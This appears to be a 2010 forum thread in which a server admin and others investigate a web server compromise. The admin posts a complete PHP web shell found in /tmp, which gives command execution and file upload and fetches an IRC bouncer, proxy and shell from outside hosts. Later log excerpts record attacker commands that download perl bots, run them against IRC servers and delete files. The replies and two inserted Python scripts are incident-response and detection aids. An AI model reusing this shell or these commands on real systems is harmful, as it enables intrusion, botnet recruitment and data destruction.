
16th July 2010, 12:50 PM | Registered User | Join Date: Nov 2004 | Location: Budapest | Posts: 311
finding the source of a break in
Hi folks.
I noticed very, very high CPU usage on my webserver. All four CPUs were running at 100%.
Top shows several perl processes from apache that run for a long time, with a high %CPU.
Since the server was fc10, I did a fresh installation to fc13, and the fresh installation didn't have this issue. Then I loaded back all the user-data, and it started again.
Several, 4, 6, 8, ... 100 perl processes from apache.
lsof -p with the pid of such a process
Code:
perl 2708 apache cwd DIR 8,50 4096 2 /
perl 2708 apache rtd DIR 8,50 4096 2 /
perl 2708 apache txt REG 8,50 12952 88227 /usr/bin/perl
perl 2708 apache mem REG 8,50 1488512 32257 /usr/lib64/perl5/CORE/libperl.so
perl 2708 apache mem REG 8,50 150672 37544 /lib64/ld-2.12.so
perl 2708 apache mem REG 8,50 1838312 74443 /lib64/libc-2.12.so
perl 2708 apache mem REG 8,50 141592 74572 /lib64/libpthread-2.12.so
perl 2708 apache mem REG 8,50 22536 74451 /lib64/libdl-2.12.so
perl 2708 apache mem REG 8,50 598816 83467 /lib64/libm-2.12.so
perl 2708 apache mem REG 8,50 113904 74462 /lib64/libresolv-2.12.so
perl 2708 apache mem REG 8,50 43392 78993 /lib64/libcrypt-2.12.so
perl 2708 apache mem REG 8,50 366344 78992 /lib64/libfreebl3.so
perl 2708 apache mem REG 8,50 116368 65479 /lib64/libnsl-2.12.so
perl 2708 apache mem REG 8,50 17520 85923 /lib64/libutil-2.12.so
perl 2708 apache mem REG 8,50 85936 8923 /usr/lib64/perl5/auto/Storable/Storable.so
perl 2708 apache mem REG 8,50 17976 8700 /usr/lib64/perl5/auto/Fcntl/Fcntl.so
perl 2708 apache mem REG 8,50 25640 8918 /usr/lib64/perl5/auto/Socket/Socket.so
perl 2708 apache mem REG 8,50 19384 8720 /usr/lib64/perl5/auto/IO/IO.so
perl 2708 apache 0r CHR 1,3 0t0 3988 /dev/null
perl 2708 apache 1w FIFO 0,8 0t0 75232 pipe
perl 2708 apache 2w REG 8,50 650730 87803 /var/log/httpd/error_log
perl 2708 apache 3u IPv4 75558 0t0 TCP r2.d250.hu:34516->89.208.121.194:6777 (ESTABLISHED)
perl 2708 apache 238r REG 8,50 1156240 279981 /usr/share/GeoIP/GeoIP.dat
perl 2708 apache 241u unix 0xffff8801dc8e7600 0t0 75219 socket
The established connection is sometimes "proud2pirate.com", which is a non-existing domain.
16th July 2010, 12:55 PM | Registered User | Join Date: Nov 2004 | Location: Budapest | Posts: 311
Re: finding the source of a break in
I found a "conf.php" file in /tmp, as once a process indicated the use of that folder.
PHP Code:
<title>-x: #SEMBON CrEw :x-</title>
<body text="lightblue" bgcolor="black">
<font face="Verdana" color="red" size="3">
<div align="left">
<p align="center">
<b>#SEMBON CrEw</b>
<font face="Verdana" color="yellow" size="2">
<p align="center">
<b>Bluetooth</b>
</p>
<hr>
<div align="left">
<b>
<?phpcloselog( );$user = get_current_user( );$login = posix_getuid( );$euid = posix_geteuid( );$ver = phpversion( );$up = `uptime`;$gid = posix_getgid( );if ($chdir == "") $chdir = getcwd( );if(!$whoami)$whoami=exec("whoami");?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php$uname = posix_uname( );while (list($info, $value) = each ($uname)) {?>
<TR>
<TD align="left">
<DIV STYLE="font-family: verdana; font-size: 10px;">
<b>
<span style="font-size: 9pt">
<?= $info ?>
<span style="font-size: 9pt">:</b> <?= $value ?>
</span>
</DIV>
</TD>
</TR>
<?php}?>
<TR>
<TD align="left">
<DIV STYLE="font-family: verdana; font-size: 10px;">
<b>
<span style="font-size: 9pt">User Info:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span>
</DIV>
</TD>
</TR>
<TR>
<TD align="left">
<DIV STYLE="font-family: verdana; font-size: 10px;">
<b>
<span style="font-size: 9pt">Current Path:</b> <?= $chdir ?>
</span>
</DIV>
</TD>
</TR>
<TR>
<TD align="left">
<DIV STYLE="font-family: verdana; font-size: 10px;">
<b>
<span style="font-size: 9pt">Write Directory:</b> <? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>
</span>
</DIV>
</TD>
</TR> <TR>
<TD align="left">
<DIV STYLE="font-family: verdana; font-size: 10px;">
<b>
<span style="font-size: 9pt">Server Services:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
</span>
</DIV>
</TD>
</TR>
<TR>
<TD align="left">
<DIV STYLE="font-family: verdana; font-size: 10px;">
<b>
<span style="font-size: 9pt">Server Address:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?>
</span>
</DIV>
</TD>
</TR>
<TR>
<TD align="left">
<DIV STYLE="font-family: verdana; font-size: 10px;">
<b>
<span style="font-size: 9pt">Script Current User:</b> <?= $user ?>
</span>
</DIV>
</TD>
</TR>
<TR>
<TD align="left">
<DIV STYLE="font-family: verdana; font-size: 10px;">
<b>
<span style="font-size: 9pt">UP Time:</b> <?= $up ?>
</span>
</DIV>
</TD>
</TR>
<TR>
<TD align="left">
<DIV STYLE="font-family: verdana; font-size: 10px;">
<b>
<span style="font-size: 9pt">PHP Version:</b> <?= $ver ?>
</span>
</DIV>
</TD>
</TR>
<TR>
<TD align="left">
<DIV STYLE="font-family: verdana; color: red ; font-size: 10px;">
<b>
<span style="font-size: 9pt">Wget:</b> <? if(exec("wget --help")){ echo "Yes"; }else{ echo "No"; } ?>
</span>
</DIV>
</TD>
</TR> </TABLE>
</b>
</font>
<?phpset_magic_quotes_runtime(0);$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);$UName = `uname -a`;$SCWD = `pwd`;$UserID = `id`;if( $currentWD == "" ) { $currentWD = $SCWD;}if( $_POST['_act'] == "[W]Dir" ) { $currentCMD = "find . -type d -perm -2 -ls";}if( $_POST['_act'] == "GAE PSY" ) { $currentCMD = "mkdir /tmp/....;cd /tmp/....;wget http://www.php.monacoyachtshow.org/zoneperso/images/psy.tar.gz;tar -zxvf psy.tar.gz;rm -rf psy.tar.gz;cd /tmp/..../.psy;./config $currentCMD ;./****;./run";}if( $_POST['_act'] == "GAE SHELL" ) { $currentCMD = "wget http://www.koreadefence.net/data/ReMaJA/xshell.txt;mv xshell.txt info.php";}if( $_POST['_act'] == "PROXY" ) { $currentCMD = "mkdir /tmp/....;cd /tmp/..../;wget http://www.php.monacoyachtshow.org/zoneperso/images/proxy.tgz;tar -zxvf proxy.tgz;rm -rf proxy.tgz;cd /tmp/.../pro;./prox -d -a -p$currentCMD";}if( $_POST['_act'] == "CHECK" ) { $currentCMD = "ps x";}if( $_POST['_act'] == "LIST IP" ) { $currentCMD = "/sbin/ifconfig | grep inet";}if( $_POST['_act'] == "PORTS" ) { $currentCMD = "netstat -an";}if( $_POST['_act'] == "List Files" ) { $currentCMD = "ls -la";}print "<form method=post enctype=\"multipart/form-data\">
<hr>
<table>";print "<tr>
<td>
<b>Execute command:</b>
</td>
<td>
<input size=100 name=\"_cmd\" value=\"".$currentCMD."\">
</td>";print "<td>
<input type=submit name=_act value=\"EXECT\">
<input type=submit name=_act value=\"GAE PSY\">
<input type=submit name=_act value=\"PROXY\">
</td>
</tr>";print "<tr>
<td>
<b>Change directory:</b>
</td>
<td>
<input size=100 name=\"_cwd\" value=\"".$currentWD."\">
</td>";print "<td>
<input type=submit name=_act value=\"List Files\">
<input type=submit name=_act value=\"[W]Dir\">
<input type=submit name=_act value=\"GAE SHELL\">
</td>
</tr>";print "<tr>
<td>
<b>Upload file:</b>
</td>
<td>
<input size=85 type=file name=_upl>
</td>";print "<td>
<input type=submit name=_act value=\"Upload!\">
</td>
</tr>";print "<tr>
<td>
<input type=submit name=_act value=\"HELP\">
<input type=submit name=_act value=\"CHECK\">
<input type=submit name=_act value=\"LIST IP\">
<input type=submit name=_act value=\"PORTS\">
</td>
</tr>";print "</table>
</form>
<hr>";$currentCMD = str_replace("\\\"","\"",$currentCMD);$currentCMD = str_replace("\\\'","\'",$currentCMD);if( $_POST['_act'] == "HELP" ) {print "<table>";print "<tr>
<td>Command EXECT = Untuk menjalankan perintah.</td>
</tr>";print "<tr>
<td>Command PROXY = Masukkan port proxy di kolom EXECT.</td>
</tr>";print "<tr>
<td>Command GAE PSY = Masukkan port di kolom EXECT.</td>
</tr>";print "<tr>
<td>Command GAE SHELL = Menginstall Shell .</td>
</tr>";print "<tr>
<td>Command LIST IP = Untuk mengetahui IP Shell.</td>
</tr>";print "<tr>
<td>Command LIST = Untuk melihat isi direktori.</td>
</tr>";print "<tr>
<td>Command [W]Dir = Untuk melihat direktori WRITE.</td>
</tr>";print "<tr>
<td>Command PORTS = Untuk melihat port yg terbuka.</td>
</tr>";print "<tr>
<td>Command CHECK = Untuk melihat semua proses.</td>
</tr>";print "</table>
</form>
<hr>
<hr>";}if( $_POST['_act'] == "Upload!" ) {if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {print "<center>
<b>DancoX ErroR!</b>
</center>";} else {print "<center>
<pre>";system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");print "</pre>
<b>Upload Berhasil CoY!</b>
</center>";} } else {print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";$currentCMD = "cd ".$currentWD.";".$currentCMD;system("$currentCMD 1> /tmp/sembonShell 2>&1; cat /tmp/sembonShell; rm -rf /tmp/sembonShell");print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center>
<hr>
<center>
<b>#SEMBON CrEw!</b>
</center>";}?>
</body>
</font>
</font>
</b>
</font>
<?php$lmge = "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"; eval(base64_decode($lmge));exit;?>
---------- Post added at 01:55 PM CDT ---------- Previous post was at 01:51 PM CDT ----------
Killing those processes by pid helps only temporarily.
I would like to know how I could find the caller script, or whatever is triggering this process, so I can get rid of it. Then I will assign new passwords to all users.
Any ideas? Thank you. ...
FC13 with the latest updates, mod_security is installed, ....
16th July 2010, 05:22 PM | Guest | Posts: n/a
Re: finding the source of a break in
Quote:
Originally Posted by LaKing
I would like to know, how I could find the caller script, or whatever is triggering this process, so I can get rid of it. Then I will assign new passwords to all users.
The problem is the PHP application or script you're running. It allows (or might allow) remote downloads and process control through the web server account. Reinstalling or upgrading an OS is the best thing you can do for a cracker as you've helped it to cover its tracks.
Best way would be to
- save full process, network, open files and user login records,
- shut down any services unnecessary for cleaning up (meaning keep SSH, kill any FTP daemon, MySQL, web server and rogue processes),
- raise the firewall to only allow traffic from and to your management IP (range),
- verify package integrity and check your logs (Logwatch?), and
- run checks from a checklist like say http://web.archive.org/web/200801092...checklist.html. With web stack compromises like these chances are the kids didn't look for root access but you want to make certain.
16th July 2010, 05:59 PM | Registered User | Join Date: Aug 2009 | Location: Waldorf, Maryland | Posts: 6,089
Re: finding the source of a break in
If you take a full "ps" listing (ps -elf) and put it in a file, then you can follow the process tree. Each process entry will have its parent process listed. As long as that parent hasn't terminated, the parent process will not be shown as 1.
By following the tree you will eventually get to what started it.
You can also try "ps -eH", which will create a tree-formatted output, but it will not contain quite as much information (such as process owner); you can include that (use "ps -elH", but it makes the listing much wider).
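An added example, not from the thread, of the parent-chain walk described above: it parses a saved `ps -elf` listing, follows PPID links from a suspect PID up to init, and reports when the chain is cut because the launcher already exited (PPID 1). The listing inside is constructed sample data modelled on the thread, not a real capture.

```python
"""Follow a suspect PID back to whatever started it in a saved `ps -elf` file."""
import sys

# Constructed sample of `ps -elf` output. The column layout is the real one;
# the processes are invented to mirror the thread: perl started under apache.
SAMPLE_PS_ELF = """\
F S UID        PID  PPID  C PRI  NI ADDR SZ WCHAN  STIME TTY          TIME CMD
4 S root         1     0  0  80   0 -  4730 poll_s Jul16 ?        00:00:02 /sbin/init
5 S root      1881     1  0  80   0 - 23450 poll_s Jul16 ?        00:00:01 /usr/sbin/httpd
5 S apache    2690  1881  0  80   0 - 23560 inet_c Jul16 ?        00:00:00 /usr/sbin/httpd
0 S apache    2701  2690  0  80   0 -  4250 wait   12:40 ?        00:00:00 sh -c cd /tmp;perl ddos.txt
0 R apache    2708  2701 99  80   0 -  9130 -      12:40 ?        00:12:33 perl ddos.txt
0 R apache    3011     1 98  80   0 -  9130 -      12:41 ?        00:10:02 [bash]
"""

# `ps -elf` prints 14 fixed columns before CMD; CMD itself may contain spaces.
CMD_COLUMN = 14


def parse_ps_elf(text):
    """Return {pid: (ppid, uid, cmd)} from the text of a `ps -elf` listing."""
    procs = {}
    for line in text.splitlines()[1:]:          # first line is the header row
        fields = line.split(None, CMD_COLUMN)
        if len(fields) <= CMD_COLUMN:
            continue                            # blank or truncated line
        uid, pid, ppid = fields[2], int(fields[3]), int(fields[4])
        procs[pid] = (ppid, uid, fields[CMD_COLUMN])
    return procs


def ancestry(procs, pid):
    """List (pid, uid, cmd) from `pid` upward until init or an unknown parent.

    The `seen` set guards against a corrupted listing that loops.
    """
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ppid, uid, cmd = procs[pid]
        chain.append((pid, uid, cmd))
        if pid == 1:
            break
        pid = ppid
    return chain


def launcher_gone(procs, pid):
    """True when a non-root process hangs directly off init.

    As the post above notes, once the real parent exits the child is shown
    with PPID 1 and the listing alone can no longer say what started it.
    Root-owned daemons legitimately have PPID 1, so they are not flagged
    (a heuristic, adequate for the web-server-account case in the thread).
    """
    ppid, uid, _ = procs[pid]
    return ppid == 1 and uid != "root"


def report(procs, pid):
    """Human-readable trace for one PID, innermost process first."""
    lines = ["%6d %-8s %s" % entry for entry in ancestry(procs, pid)]
    if pid in procs and launcher_gone(procs, pid):
        lines.append("(parent already exited: launcher not recoverable from ps)")
    return "\n".join(lines)


if __name__ == "__main__":
    # Usage: python trace_parent.py PID [saved-ps-elf.txt]; defaults to the sample.
    target = int(sys.argv[1]) if len(sys.argv) > 1 else 2708
    text = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_PS_ELF
    print(report(parse_ps_elf(text), target))
```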
16th July 2010, 06:53 PM | Banned | Join Date: Oct 2009 | Posts: 358
Re: finding the source of a break in
Quote:
Originally Posted by unSpawn
The problem is the PHP application or script you're running. It allows (or might allow) remote downloads and process control through the web server account.
Could be perl too if you are letting them have perl access.
Quote:
Originally Posted by unSpawn
Reinstalling or upgrading an OS is the best thing you can do for a cracker as you've helped it to cover its tracks.
Not really. Finding and prosecuting them with the information they've left is usually futile. If they have gained root access re-installing is the best thing you can do.
Back up each user account again and restore each one individually until you find the culprit.
Shut down the offending account(s) permanently.
Thanks,
Zanpactou
16th July 2010, 11:09 PM | Guest | Posts: n/a
Re: finding the source of a break in
Quote:
Originally Posted by Zanpactou
Could be perl too if you are letting them have perl access.
Good one. Basically any interpreter.
* BTW who mentioned prosecution or root level compromises?.. NM, since you've got the certifications and have handled R/L incidents longer than me I'm sure you know SOP way better than I do.
17th July 2010, 12:58 AM | Banned | Join Date: Oct 2009 | Posts: 358
Re: finding the source of a break in
Quote:
Originally Posted by unSpawn
Good one. Basically any interpreter.
Yes, and anything in the cgi directories too, if you are letting users upload and use stuff in a cgi directory or per-user cgi directories.
But yeah, looks like a rogue perl script.
Thinking about it, you could isolate all the .pl scripts in the user's directories, back them up and then delete them to see if the problem stops.
FYI : This looks to be someone trying to use an account on your server as part of a bot net or to serve or distribute, seed, etc torrent files.
It looks very much to me like the bot net.
I say that because surely you have per user quotas for resource usage, in/out connections along with a firewall set up?
In the UK where I'm from, they recently passed the DBB so I would just call the Police if I found a bot net on a server now and let them collect any information in order to bring the criminals to justice, whereas before I wouldn't have cared and just stopped it.
Thanks,
Zanpactou
17th July 2010, 08:53 AM | Guest | Posts: n/a
Re: finding the source of a break in
Quote:
Originally Posted by Zanpactou
But yeah, looks like a rogue perl script.
You sure it's Perl?
Quote:
Originally Posted by Zanpactou
Thinking about it, you could isolate all the .pl scripts in the user's directories, back them up and then delete them to see if the problem stops.
That's a friendly thing to do. For the cracker that is. While you're busy finding out and until you found the infection vector it still has access.
Quote:
Originally Posted by Zanpactou
This looks to be someone trying to use an account on your server as part of a bot net or to serve or distribute, seed, etc torrent files.
It looks very much to me like the bot net. I say that because surely you have (..)
If you actually read the file you'd see it's just a PHP-based control shell. Translating text you can read "To run the command. Enter the proxy port in the column EXECT. Insert port on EXECT column. Installing Command Shell. To know the IP Shell. To view the contents of the directory. WRITE To view the directory. To see an open port. To see all the processes.". It creates a "/tmp/...." directory, can download three items (if the names say anything about the functionality then it's an IRC bouncer: psy.tar.gz, a command shell: xshell.txt and some proxy: proxy.tgz) and configure and run them, it uses a temporary file "/tmp/sembonShell" and the proxy might not work if it got the paths wrong as it reads "/tmp/.../pro" instead of four dots. So no "evidence" for botnet applications or torrents.
17th July 2010, 11:49 AM | Banned | Join Date: Oct 2009 | Posts: 358
Re: finding the source of a break in
Quote:
Originally Posted by unSpawn
If you actually read the file you'd see it's just a PHP-based control shell. Translating text you can read "To run the command. Enter the proxy port in the column EXECT. Insert port on EXECT column. Installing Command Shell. To know the IP Shell. To view the contents of the directory. WRITE To view the directory. To see an open port. To see all the processes.". It creates a "/tmp/...." directory, can download three items (if the names say anything about the functionality then it's an IRC bouncer: psy.tar.gz, a command shell: xshell.txt and some proxy: proxy.tgz) and configure and run them, it uses a temporary file "/tmp/sembonShell" and the proxy might not work if it got the paths wrong as it reads "/tmp/.../pro" instead of four dots. So no "evidence" for botnet applications or torrents.
Hmm. I see. You are one of those people.
Look at his top output. perl.
If there are many accounts, how is one php file proof of the full extent of any kind of problem?
It isn't.
Thanks,
Zanpactou
17th July 2010, 02:51 PM | Registered User | Join Date: Nov 2004 | Location: Budapest | Posts: 311
Re: finding the source of a break in
Thank you guys for all those replies. ...
IMO reinstalling was a good choice; the OS was outdated, and I hope that this makes re-entering my server a bit more difficult. However, I still have the old OS too, and all files, and all log files saved. I could even boot into the old OS ... if there were a point in it.
Here is some current process stress that is running. ...
PIDs 30290 and 30635 each run with high CPU usage. 'Top' says they are all perl.
Code:
1 root Jul16 /sbin/init
[ .. lots of processes, and at the end of 1 ...]
30290 apache 09:20 [bash]
30635 apache 10:08 /sbin/klogd
[...]
Code:
Open Files and Connections For process [bash] (PID 30290)
Open files
File Descriptor Type File size Inode Path
Current dir Directory 4096 2 /
Root dir Directory 4096 2 /
Program code Regular file 12952 8428 /usr/bin/perl
Shared library Regular file 150672 11379 /lib64/ld-2.12.so
Shared library Regular file 1838296 11527 /lib64/libc-2.12.so
Shared library Regular file 141576 12072 /lib64/libpthread-2.12.so
Shared library Regular file 22536 18787 /lib64/libdl-2.12.so
Shared library Regular file 1488512 13602 /usr/lib64/perl5/CORE/libperl.so
Shared library Regular file 598816 20711 /lib64/libm-2.12.so
Shared library Regular file 113904 83765 /lib64/libresolv-2.12.so
Shared library Regular file 43392 85916 /lib64/libcrypt-2.12.so
Shared library Regular file 366344 85915 /lib64/libfreebl3.so
Shared library Regular file 17520 84424 /lib64/libutil-2.12.so
Shared library Regular file 116368 85097 /lib64/libnsl-2.12.so
Shared library Regular file 85936 8922 /usr/lib64/perl5/auto/Storable/Storable.so
Shared library Regular file 17976 8698 /usr/lib64/perl5/auto/Fcntl/Fcntl.so
Shared library Regular file 25640 83717 /usr/lib64/perl5/auto/Socket/Socket.so
Shared library Regular file 19384 8718 /usr/lib64/perl5/auto/IO/IO.so
2w Regular file 866183 87803 /var/log/httpd/error_log
238r Regular file 1156240 279981 /usr/share/GeoIP/GeoIP.dat
Open network connections
Type Protocol File Descriptor Details
IPV4 TCP 3u 195.228.45.188:35803 -> 89.208.121.194:6777 ESTABLISHED
Code:
Open Files and Connections For process /sbin/klogd (PID 30635)
Open files
File Descriptor Type File size Inode Path
Current dir Directory 4096 2 /
Root dir Directory 4096 2 /
Program code Regular file 12952 8428 /usr/bin/perl
Shared library Regular file 150672 11379 /lib64/ld-2.12.so
Shared library Regular file 1838296 11527 /lib64/libc-2.12.so
Shared library Regular file 141576 12072 /lib64/libpthread-2.12.so
Shared library Regular file 22536 18787 /lib64/libdl-2.12.so
Shared library Regular file 1488512 13602 /usr/lib64/perl5/CORE/libperl.so
Shared library Regular file 598816 20711 /lib64/libm-2.12.so
Shared library Regular file 113904 83765 /lib64/libresolv-2.12.so
Shared library Regular file 43392 85916 /lib64/libcrypt-2.12.so
Shared library Regular file 366344 85915 /lib64/libfreebl3.so
Shared library Regular file 17520 84424 /lib64/libutil-2.12.so
Shared library Regular file 116368 85097 /lib64/libnsl-2.12.so
Shared library Regular file 85936 8922 /usr/lib64/perl5/auto/Storable/Storable.so
Shared library Regular file 17976 8698 /usr/lib64/perl5/auto/Fcntl/Fcntl.so
Shared library Regular file 25640 83717 /usr/lib64/perl5/auto/Socket/Socket.so
Shared library Regular file 19384 8718 /usr/lib64/perl5/auto/IO/IO.so
2w Regular file 866183 87803 /var/log/httpd/error_log
238r Regular file 1156240 279981 /usr/share/GeoIP/GeoIP.dat
Open network connections
Type Protocol File Descriptor Details
IPV4 TCP 3u 195.228.45.188:37396 -> 89.208.121.194:6777 ESTABLISHED
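The two entries above call themselves `[bash]` and `/sbin/klogd` while their program code is `/usr/bin/perl`. An added example, not from the thread, that turns that observation into a check: it compares the name a process shows in ps/top (argv[0] from /proc/PID/cmdline) with the binary it actually runs (/proc/PID/exe) and also flags a binary deleted after launch. The records it is tested on are constructed to match the thread; `scan_proc()` applies the same check to a live /proc.

```python
"""Flag processes whose displayed name does not match the binary they run."""
import os

# Constructed records (pid, argv[0], resolved /proc/PID/exe) mirroring the thread.
SAMPLE_RECORDS = [
    (30290, "[bash]", "/usr/bin/perl"),            # kernel-thread lookalike
    (30635, "/sbin/klogd", "/usr/bin/perl"),       # daemon lookalike
    (1881, "/usr/sbin/httpd", "/usr/sbin/httpd"),  # honest daemon
    (2200, "-bash", "/bin/bash"),                  # login shell: leading '-' is normal
    (4100, "perl", "/tmp/perl (deleted)"),         # binary removed after launch
]

DELETED = " (deleted)"   # suffix the kernel appends to /proc/PID/exe of an unlinked binary


def masquerade_reason(argv0, exe):
    """Return why the process looks disguised, or None if name and binary agree.

    argv0: first element of /proc/PID/cmdline (what ps and top print).
    exe:   target of the /proc/PID/exe symlink.
    Interpreters reached through symlinks (python3 -> python3.11) need an
    allowlist in front of this check; that is left out here for brevity.
    """
    if not argv0 or not exe:
        return None
    if exe.endswith(DELETED):
        return "binary %s was deleted after start" % exe[: -len(DELETED)]
    name = argv0.lstrip("-")                  # login shells show as -bash
    # Real kernel threads display as [name] and have no exe link at all, so a
    # bracketed name with a resolvable exe is an imitation.
    if name.startswith("[") and name.endswith("]"):
        return "kernel-thread style name %s but exe is %s" % (name, exe)
    if os.path.isabs(name):
        if os.path.realpath(name) != os.path.realpath(exe):
            return "argv[0] %s does not match exe %s" % (name, exe)
    elif os.path.basename(name) != os.path.basename(exe):
        return "argv[0] %s does not match exe %s" % (name, exe)
    return None


def check_records(records):
    """Map pid -> reason for every record that masquerade_reason flags."""
    findings = {}
    for pid, argv0, exe in records:
        reason = masquerade_reason(argv0, exe)
        if reason:
            findings[pid] = reason
    return findings


def read_proc_records(proc="/proc"):
    """Collect (pid, argv[0], exe) for the processes this user may inspect."""
    records = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc, entry, "cmdline"), "rb") as fh:
                argv0 = fh.read().split(b"\0", 1)[0].decode("utf-8", "replace")
            exe = os.readlink(os.path.join(proc, entry, "exe"))
        except OSError:
            continue   # kernel threads have no exe; other users' PIDs need root
        records.append((int(entry), argv0, exe))
    return records


def scan_proc():
    """Run the check over the live system; run as root to see every process."""
    return check_records(read_proc_records())


if __name__ == "__main__":
    for pid, reason in sorted(scan_proc().items()):
        print("%6d  %s" % (pid, reason))
```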
17th July 2010, 02:52 PM | Registered User | Join Date: Nov 2004 | Location: Budapest | Posts: 311
Re: finding the source of a break in
In my httpd settings all logs go to /logs/..., so it appears strange to me that something is logging to /var/log/httpd/error_log.
Code:
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download http://www.idariyargi.org//modules/mod_yoo_login/styles/ddos.txt -O ddos.txt;curl -O http://www.idariyargi.org//modules/mod_yoo_login/styles/ddos.txt -O ddos.txt;perl ddos.txt'
curl: (6) Could not resolve host: novayesyoucan.org; Cannot allocate memory
mv: cannot stat `sss.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
sh: fetch: command not found
mv: cannot stat `sss.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
sh: wget: command not found
mv: cannot stat `sss.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file lite.txt: Permission denied
0 189k 0 1448 0 0 10084 0 0:00:19 --:--:-- 0:00:19 33674
curl: (23) Failed writing body (0 != 1448)
[...]
mv: cannot stat `lite.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file lite.txt: Permission denied
0 189k 0 1448 0 0 10961 0 0:00:17 --:--:-- 0:00:17 39135
curl: (23) Failed writing body (0 != 1448)
mv: cannot stat `lite.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
sh: wget: command not found
mv: cannot stat `lite.txt': No such file or directory
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download http://my.heritagedreamscapes.com/e107_docs/.bs.jpg;perl .bs.jpg irc.byroe.net 6667;rm -rf *.*;curl -O http://my.heritagedreamscapes.com/e107_docs/.bs.jpg;perl .bs.jpg irc.byroe.net 6667;rm -rf *.*'
sh: -c: line 0: syntax error near unexpected token `<'
[...]
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download http://pvvkus.ru/e107_images/iso.txt -O iso.txt;curl -O http://pvvkus.ru/e107_images/iso.txt -O iso.txt;perl iso.txt irc.ownzirc.co.cc'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file lite.txt: Permission denied
0 189k 0 1448 0 0 7317 0 0:00:26 --:--:-- 0:00:26 19306
curl: (23) Failed writing body (0 != 1448)
mv: cannot stat `lite.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
sh: wget: command not found
mv: cannot stat `lite.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
mv: cannot stat `lite.txt': No such file or directory
chmod: cannot access `sh.php': No such file or directory
ls: cannot access sh.php: No such file or directory
find: `./e107_plugins/log': Permission denied
sh: wget: command not found
ls: cannot access mod.php: No such file or directory
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download http://pvvkus.ru/e107_images/scan.txt -O scan.txt;curl -O http://pvvkus.ru/e107_images/scan.txt -O scan.txt;perl scan.txt'
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `cd /var/tmp;cd /tmp;lwp-download http://pvvkus.ru/e107_images/scan.txt -O scan.txt;curl -O http://pvvkus.ru/e107_images/scan.txt -O scan.txt;perl scan.txt'
sh: -c: line 0: syntax error near unexpected token `<'
[...]
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `kill-all -9 perl;rm -fr *;curl -O http://allsib.info/administrator/templates/system/html/def.txt;mv def.txt index.php;lwp-download http://allsib.info/administrator/templates/system/html/def.txt;mv def.txt index.php;cd /var/tmp;cd /tmp;rm -fr *;lwp-download http://allsib.info/administrator/templates/system/html/bsd.xp -O bsd.xp;curl -O http://allsib.info/administrator/templates/system/html/bsd.xp -O bsd.xp;wget http://allsib.info/administrator/templates/system/html/bsd.xp -O bsd.xp;perl bsd.xp irc.planetwork-team.co.cc'
[...]
sh: -c: line 0: `kill-all -9 perl;rm -fr *;curl -O http://dizzycoder.go.ro/log/logs/def.txt;mv def.txt index.php;lwp-download http://dizzycoder.go.ro/log/logs/def.txt;mv def.txt index.php;cd /var/tmp;cd /tmp;rm -fr *;lwp-download http://dizzycoder.go.ro/log/logs/win.xp -O win.xp;curl -O http://dizzycoder.go.ro/log/logs/win.xp -O win.xp;wget http://dizzycoder.go.ro/log/logs/win.xp -O win.xp;perl win.xp irc.allnetwork.org'
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `kill-all -9 perl;rm -fr *;curl -O http://dizzycoder.go.ro/log/logs/def.txt;mv def.txt index.php;lwp-download http://dizzycoder.go.ro/log/logs/def.txt;mv def.txt index.php;cd /var/tmp;cd /tmp;rm -fr *;lwp-download http://dizzycoder.go.ro/log/logs/win.xp -O win.xp;curl -O http://dizzycoder.go.ro/log/logs/win.xp -O win.xp;wget http://dizzycoder.go.ro/log/logs/win.xp -O win.xp;perl win.xp irc.allnetwork.org'
sh: wget: command not found
sh: wget: command not found
tar: psy.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
tar: psy.tar.gz: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
sh: line 0: cd: /tmp/.psy: No such file or directory
tar: Child returned status 2
tar: Exiting with failure status due to previous errors
sh: line 0: cd: /tmp/.psy: No such file or directory
